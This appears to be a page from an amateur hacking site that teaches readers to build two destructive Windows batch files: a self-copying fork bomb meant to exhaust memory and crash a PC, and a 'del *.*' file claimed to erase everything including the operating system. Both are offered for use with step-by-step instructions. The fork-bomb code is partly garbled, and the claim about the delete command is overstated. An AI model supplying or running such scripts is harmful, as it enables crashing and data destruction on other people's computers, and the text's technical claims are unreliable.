The GHU Offical Website

Teaching you the art of exploitation to protect yourself
Crashing a PC with a .Bat
Desc: This .bat will constantly create another .bat in the same place the following will do the same. This will never stop happening until the computer completley runs out of memory and were greeted with our good friend... Blue screen. *WARNING* This is not a game this file can siersously damage a pc. Do not mess around with this as it is dangerous.
1) Open notepad
2)Type in the following:
@echo off
:A
SET /A
x-%RANDOM%%%1999999999%
type damage.bat >> %x%.bat
start %x%.bat
goto:A
3)Save the file as damage.bat (change it to all file types as usual) Were Done!
Deleting EVERYTHING with a .Bat
This one is EVEN more HARMFULL than crashing it. Crashing has a chance of permenant damage... This one is 100% going to do permenant damage to the pc. DO NOT TREAT LIKE A GAME. This simple 7 letter thing can delete EVERYTHING including the operating system. The pc will no longer be usable unless a new operating system installed. It takes around 2 minutes but is normally stopped by anti-virus.
1)Open notepad
2) Type the following:
del *.*
3) Save as del.bat (all file types)
REMEMBER THIS IS VERY DANGEROUS